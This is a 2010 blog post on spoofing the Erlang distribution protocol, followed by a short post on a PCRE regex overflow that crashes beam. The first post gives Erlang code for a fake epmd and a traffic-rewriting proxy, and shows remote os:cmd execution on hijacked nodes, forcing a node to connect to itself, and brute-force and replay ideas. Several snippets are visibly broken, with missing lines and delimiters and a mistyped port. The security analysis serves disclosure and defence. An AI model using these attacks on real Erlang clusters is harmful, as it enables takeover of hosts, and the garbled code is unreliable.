Wednesday, March 31, 2010

Spoofing the Erlang Distribution Protocol

(Update (2010/09/15): Well, that's annoying! With the release of Erlang R14B, it looks as if some of the issues with epmd have been fixed! Here is the log of the commit made by bufflig (Patrik Nyblom):
Fix anomalies in epmd not yet reported as security issues

Use erts_(v)snprintf to ensure no buffer overruns in debug printouts.
Disallow everything except port and name requests from remote nodes.
Disallow kill command even from localhost if alive nodes exist.
  -relaxed_command_check when starting epmd returns the possibility to
  kill this epmd when nodes are alive (from localhost).
Disallow stop command completely except if -relaxed_command_check is given
  when epmd was started.
Environment variable ERL_EPMD_RELAXED_COMMAND_CHECK can be set to always get

Fortunately (for those wishing to spoof the protocol), there are still other ways to kill epmd.

Awesome work by the Erlang/OTP team!)

One of the unique features of the Erlang programming language is the transparent, built in distribution. The unit of activity in Erlang is the process. Processes run on nodes which reside locally or on remote servers, communicating by message passing. If a process somewhere crashes, a linked process running on another server can detect the crash and perform error recovery.

Erlang distribution is very easy to use, pretty much working out of the box. But, in the default configuration, it's often advised that the Erlang distribution protocol is insecure and should only be run on trusted networks:
[The cookie authentication mechanism] is not entirelly safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.
So the questions are: what are the risks in running a distributed Erlang node, where can distribution be used safely and what can be done to limit potential attacks against it?
Source code is available on github.

Erlang Distribution

The Erlang Port Mapper Daemon

Distributed Erlang nodes bind a random TCP port for distribution requests. The Erlang port mapper daemon, or epmd, maps the name of the node to the port on which the node is listening.

epmd acts as a key/value store. A node registers with epmd by opening a TCP connection to localhost on a well known port (4396). The node sends a message containing the node name and distribution port. The node is now registered and will remain registered until the TCP connection is dropped.

An example of a registration message is:
register({IP, Port}, Key, Value) ->
    Packet = <<
    120,                    % ALIVE2_REQ response: x
    Value:16,                % PortNo
    77,                     % NodeType: normal Erlang node
    0,                      % Protocol: TCP
    0,5,                    % Highest Version
    0,5,                    % Lowest Version
    (byte_size(Node)):16,   % NLen
    Node/bytes,             % NodeName
    0,0                     % ELen
    {ok, Socket} = gen_tcp:connect(IP, Port, [
            {active, true},
    ok = gen_tcp:send(Socket, Packet),

wait(Socket) ->
    receive _ -> wait(Socket) end.

A Distributed Erlang Node

A node is started in distributed mode when the -sname or -name option is passed on the command line to the erl command. Erlang will start an epmd process if one is currently not running.

When a request is made to connect to another distributed Erlang node, for example by using net_adm:ping(''), the Erlang node will resolve the portion of the node name after the @ symbol (or use localhost, if the node is brought up using -sname), and send a PORT_PLEASE2_REQ request for the name (the portion of the atom preceding the @ sign) to the resolved IP address. epmd responds with a message containing the node's port and closes the connection.

The originating Erlang node now opens a TCP connection to the destination Erlang node's distribution port. The nodes authenticate each other using the Erlang cookie mechanism. If the challenge handshake succeeds, the nodes are connected. Communication is bidirectional. This link will be used for all distributed operations between the two nodes.

Erlang Cookies

Erlang cookie authentication resembles RADIUS, CHAP and X11 magic cookies. Cookies are a secret that must be known on all members of the Erlang cluster. Valid characters in a cookie are ASCII 32-126 (space to tilde).

Generating the Erlang Cookie

If a secret is not provided, Erlang will generate a 20 byte file in the user's home directory (~/.erlang.cookie) composed of uppercase letters. Erlang uses a weak pseudo-random number generator with an implementation similar to rand(3). The seed is the seconds and microseconds fields of erlang:now(). The returned random value acts as the seed for the next random value until 20 uppercase letters are chosen. The creation time of the ~/.erlang.cookie file is changed to midnight to obscure the initial seed value.

The Challenge Handshake

The challenge process is explained in the Erlang kernel documentation. The kernel docs show a 4 byte digest used to verify knowledge of the secret, instead of the 16 byte digest generated by MD5. Maybe at one point the cookie mechanism used something like CRC32.(The docs have been updated).

After the TCP connection is established, the originating node sends:
  • "n"
  • Version0
  • Version1
  • Flag0
  • Flag1
  • Flag2
  • Flag3
  • Name0
  • Name1
  • Name2
  • ...
  • NameN
The version fields are 2 bytes and contain the minimum/maximum version of the distribution protocol supported by the node. The Name fields hold the bytes representing the full name of the originating node (node and domain name).

The destination node replies with a status message indicating how the originating node may proceed. For example, the connection might not be allowed because a connection is in progress or might already exist.
  • "s"
  • Status0
  • Status1
  • ...
  • StatusN
If the status indicates the connection can continue, the destination node sends another message containing the challenge.
  • "n"
  • Version0
  • Version1
  • Flag0
  • Flag1
  • Flag2
  • Flag3
  • Challenge0
  • Challenge1
  • Challenge2
  • Challenge3
  • Name0
  • Name1
  • Name2
  • ...
  • NameN
This message contains the versions supported by the destination node, any compatibility flags, the 4 byte challenge and the node name. The challenge is generated by gathering some runtime statistics:
%% ---------------------------------------------------------------
%% Challenge code
%% gen_challenge() returns a "random" number
%% ---------------------------------------------------------------
gen_challenge() ->
    {A,B,C} = erlang:now(),
    {D,_}   = erlang:statistics(reductions),
    {E,_}   = erlang:statistics(runtime),
    {F,_}   = erlang:statistics(wall_clock),
    {G,H,_} = erlang:statistics(garbage_collection),
    %% A(8) B(16) C(16)
    %% D(16),E(8), F(16) G(8) H(16)
    ( ((A bsl 24) + (E bsl 16) + (G bsl 8) + F) bxor
        (B + (C bsl 16)) bxor
        (D + (H bsl 16)) ) band 16#ffffffff.
The originating node computes the digest by concatenating the challenge with the cookie and digesting the result using MD5:
%% Generate a message digest from Challenge number and Cookie   
gen_digest(Challenge, Cookie) when is_integer(Challenge), is_atom(Cookie) ->
The resulting 16 byte MD5 digest is sent to the destination node along with a new 4 byte challenge.
  • "r"
  • Challenge0
  • Challenge1
  • Challenge2
  • Challenge3
  • Digest0
  • Digest1
  • Digest2
  • ...
  • Digest15
The destination node verifies the received digest, computes a digest based on the origin node's challenge and replies with an acknowlegement message:
  • "a"
  • Digest0
  • Digest1
  • Digest2
  • ...
  • Digest15
If either digest does not match, the nodes will drop the connection and log a handshake failure. Authentication is performed for each TCP connection; no verification is done once the challenge process is established. If the TCP connection is dropped, for whatever reason, a new TCP connection must go through the authentication procedure again.

Abusing epmd

Running epmd

epmd comes from an environment where physical servers are dedicated to a single task. Probably all Erlang nodes ran under a single UID.

On multiuser systems, such as development servers or systems that require some privilege separation, the first Erlang node to run starts and controls the epmd process. This user can now control the port map requests given for other nodes. The user running epmd can also snoop name requests.

The temptation might be to explicitly start epmd as root at boot. Use a dedicated user, there's no reason to run as root.

epmd Authentication

epmd only requires a few operations: registering a node name and port, retrieving a port based on node name, retrieving all names and ports known to the epmd process (as well as some debug info, if requested), and shutting down epmd.

Though logically these operations are distinct for remote and local access (a remote node, for example, would never register a node/port value, since ports are local to the node and do not include the IP address; in fact, the epmd command line flags such as "-names" will only connect to localhost), no distinction is made between local and remote access to epmd. Authentication is not required to query epmd.

Any device that is allowed to open a TCP connection to the epmd port can:
  • issue a kill command and shut down the epmd process: any new attempts at joining in Erlang distribution with nodes residing on this server will fail
  • set any key/value pair
epmd allows storing of arbitrary bytes. "epmd -names" simply echoes these bytes. The output displayed by running "epmd -names" is the actual formatted message returned by the epmd server. So epmd could be used to store data, as long as the TCP connection is maintained. Some scenarios:
  • bypass network segmentation: if 2 hosts can talk to the host running epmd but not each other
  • establish a covert channel
Covert channels could be used for:
  • interprocess communication, like a command queue for bots
  • tunnelling data: TCP over epmd over TCP!
  • storage of data: the basis of a FUSE filesystem
A naive implementation might be to store an ID as the node name (the key), with the data stored in the 2 byte value allocated for the port. Even when using a secure transport layer (ssl, ssh) for the Erlang distribution protocol, nodes will still need a way of finding each other. epmd is too risky to place on a public network.

Abusing Cookies

The cookie mechanism only proves that, for the given TCP connection, there is knowledge of the secret. Though the node names are included in the challenge message, they are not included in the digest. Similarly, neither IP addresses or timestamps are included in the digest. The Erlang cookie authentication also does not validate the data sent after the handshake is completed, so there is no integrity checking built into the distribution protocol.

Replaying the Challenge

Erlang cookies are generated by concatenating a 4 byte challenge with a secret and digesting the result using MD5. The Erlang kernel documentation for this process notes the 32-bit integer used as the challenge must be very random, but really it needs only to be well distributed. The response to the challenge proves the node knows the secret. At least in theory, the only practical way to derive the secret from the digest is using brute force. But knowing the response to the challenge is equivalent to knowing the secret, if the challenge is ever repeated. The strength of the cookie mechanism lies in the time before a challenge is repeated.
1> cookie:start().
In the above test, an attacker would have had to snoop 971 handshakes before there is a repeated challenge. There are 2 challenges for each authentication. Only one successful connection is needed since the attacker can run erlang:get_cookie() once authenticated. However, being able to replay a challenge requires being able to somehow snoop connections. And for most systems, authentication is a rare event, since TCP connections for internode communication are persistent.

Brute Force

Since all nodes share the same cookie, and given that cookies likely change very rarely, its possible for the attacker to open connections to each node and brute force in parallel. Since MD5 is quite fast, and there is no provision in the protocol to slow down the digesting process, many attacks can be run.


For many environments, the threat of replay and brute force might not be that bad. While they are feasible, if you do any sort of monitoring, you'll very likely notice an attack in progress. The lack of any sort of integrity protection is a real issue; one that Erlang developers have addressed, to an extent, with the SSL transport mechanism.

Proxying from a Local Node

Since anyone can stop epmd, an attacker on the same server can bring up their own port mapper service. When epmd is killed, the attached Erlang nodes will not attempt to reconnect. An attacker can listen on any available port, open a connection to the distribution port of the Erlang node that is being targeted and advertise the port of the spoofing proxy to any distribution requests. spoofed contains some code to demonstrate this sort of attack. First, we retrieve the ports known to epmd by sending a name request (the letter "n", with a 2 byte length header):
names(IP, Port) ->
    Packet = list_to_binary([<<110>>]),
    {ok, Socket} = gen_tcp:connect(IP, Port, [
            {active, true},
    ok = gen_tcp:send(Socket, Packet),
Next, we set up a fake epmd to answer port map requests. The fake empd binds the well-known epmd port and spawns a process to handle each TCP connection. For most message types, the client expects epmd to close the connection after responding. The exception is node registration: breaking the connection will deregister the node.
loop(Socket, Port) ->
        {tcp, Socket, <<110>>} ->
            inet:setopts(Socket, [{packet, 0}]),
            Response = list_to_binary([
                    lists:flatten(io_lib:format("I can haz ~s at port ~p~n", ["fake", Port]))
            error_logger:info_report([{epmd, names_request}, {response, Response}]),
            ok = gen_tcp:send(Socket, Response);
        {tcp, Socket, <<122, Node/binary>>} ->
            inet:setopts(Socket, [{packet, 0}]),
            Response = <<
            119,                    % PORT_PLEASE2_REQ response
            0,                      % Result: no error
            Port:16,                % PortNo
            77,                     % NodeType: normal Erlang node
            0,                      % Protocol: TCP
            0,5,                    % Highest Version
            0,5,                    % Lowest Version
            (byte_size(Node)):16,   % NLen
            Node/bytes,             % NodeName
            0,0                     % ELen
            error_logger:info_report([{epmd, Node}, {response, Response}]),
            ok = gen_tcp:send(Socket, Response);
        {tcp_closed, Socket} ->
            error_logger:info_report([{epmd, tcp_close}]);
        {tcp_error, Socket} ->
            error_logger:info_report([{epmd, tcp_error}])
Finally, we set up the proxy to listen on the fake Erlang distribution port. The proxy just proxies any data, including the challenge handshake. Since the origin and destination nodes presumably share a common cookie, the authentication will succeed. Assuming 59000 is the distribution port of the Erlang node and port 59001 is unbound, we could run a proxy as follows:
spoof:epmd(59001). % where the argument is where our proxy port will be listening
spoof:proxy(59000, 590001). % Erlang distribution port, fake Erlang node proxy port.
At this point we can snoop the data being sent between nodes. Of course, we still do not know the cookie, only a derived secret (probably 2 of them), but the TCP connection from our proxy is fully authenticated. We could drop the connection to the originating node at this point and send our own messages as a fully connected distributed node:
(n@ack.lan)1> erlang:get_cookie().
However, we can also modify the connection in interesting ways:
1>F = fun(in,X)  -> re:replace(X, "foo", "bar", [{return, binary}]);
1>       (out,X) -> X end.

2>spoof:proxy(59000, 590001, F).

3>foo == bar.

4>Afoo = 123.

7>rpc:call('n@ack.lan', os, cmd, ["echo foofoo"]).

8> rpc:call('n@ack.lan', os, cmd, ["touch /tmp/ohaifoothere"]).

9> rpc:call('n@ack.lan', os, cmd, ["ls /tmp/ohaifoothere"]).

Proxying from a Remote Node

Assuming an attacker can convince an Erlang node to connect to a host under their control (using DNS poisoning, ARP spoofing, social engineering, ...), the attacker can proxy the connection anywhere. There's a problem with proxying a connection from a host to a node that is not local, though. The challenge messages contain the full name of the node that is sending the message, including the domain name. Assume there are 3 nodes: nul.lan (the originating node), ecn.lan (the destination node) and ack.lan (the attacker). If an Erlang node on nul.lan accidentally connects to ack.lan intending to reach ecn.lan (or any other node sharing the same cookie), ack.lan can forward the connection to ecn.lan. nul.lan may not even have intended to connect to ecn.lan.
spoof:proxy({{10,10,10,10},59000}, 590001, F).
Since the source/destination node names will not match, we will need to re-write them for this to work, but since there are no integrity checks, the process works transparently:
F = fun(in,X)  -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]);
       (out,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]) end.

Forcing a Node to Connect to Itself

Even on a network where the attacker does not know which nodes share the same cookie, an Erlang node can always be forced to connect to itself. Since the Erlang node will use its cookie for both sides of the authentication, it will, of course, succeed. The attacker will only need to rewrite the node names. e.g., if ecn.lan thinks it's talking to ack.lan:
1> F = fun(in,X)  -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]);
1>     (out,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]) end.
2> spoof:proxy({IP, Port}, ProxyPort, F).

erl -name r@nul.lan -remsh n@ack.lan
1> os:cmd("hostname").
This would work, for example, against a user connecting from a laptop to a node using erl -remsh or doing a etop:start([{node, ''}]). (It's worth mentioning as well, since I've never seen it discussed, that if you connect in to a distributed Erlang node, everybody who's authenticated to connect to that node has complete access to your workstation as your uid.)

"Legitimate" Uses

spoofed could be used as an example for creating an epmd that provides some protection against remote nodes abusing it and for creating Erlang distribution proxies. An Erlang distribution proxy could potentially have these advantages:
  • listens only to a single port
  • authentication mechanisms (GSS-API, SSL, etc)
  • could allow creating sandboxes by parsing the distribution messages

Tuesday, March 9, 2010

When the Bugs Have Bugs

A few months ago, I found this. Compiling a regular expression would crash beam.
N = 819,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).
After going through a bit of effort, I figured out how to compile a debug version of beam. And then, of course, I discovered the clever minds behind Erlang have already thought about this and made it easy. Essentially, after compiling Erlang:
# Recommended if you are a vi user
# Yes, the debugger forces you to use emacs
cat >> ~/.emacs
(setq viper-mode t)
(require 'viper)

export ERL_TOP=$(pwd)
cd erts/emulator
make debug FLAVOR=plain # or smp
cd ~-
bin/cerl -debug -gdb # -smp
After reading through the source code and adding a few printf's, I tracked the bug down to an incorrect test in PCRE. The magic number (819) apparently comes from:
819 x 5 bytes (capturing bracket) + 3 bytes (opening bracket) = 4098 bytes
The compile workspace is 4096 bytes, so there is a 2 byte overflow. Well, today Phillip Hazel, the author of PCRE, corrected the bug. Awesome!! Thanks, Phillip!
So here I am making the world safer one bug at a time, preparing a patch for Erlang. Except when I went to test the fix on Mac OS X, beam crashed. Ouch. This time:
% works!
N = 611,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).

% booo! crashes!!
N = 612,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0xb014effc
[Switching to process 3601]
0x001c04e4 in compile_branch (optionsptr=0x0, codeptr=0x0, ptrptr=0x0, errorcodeptr=0x0, firstbyteptr=0x0, reqbyteptr=0x0, bcptr=0x0, cd=0x0\
        , lengthptr=0x0) at pcre_compile.c:2355
Except, beam didn't crash when running inside gdb. I figured out the debug beam was non-smp and, after compiling a debug smp version, I got the longest backtrace EVAH.

Yet the same code works with an SMP Erlang on Solaris.
Blah, debugging threaded code is a pain. If someday, someone figures out how to do something malicious with this, please send me a postcard from whatever island retreat you've purchased with all your stolen credit cards or DoS extortions.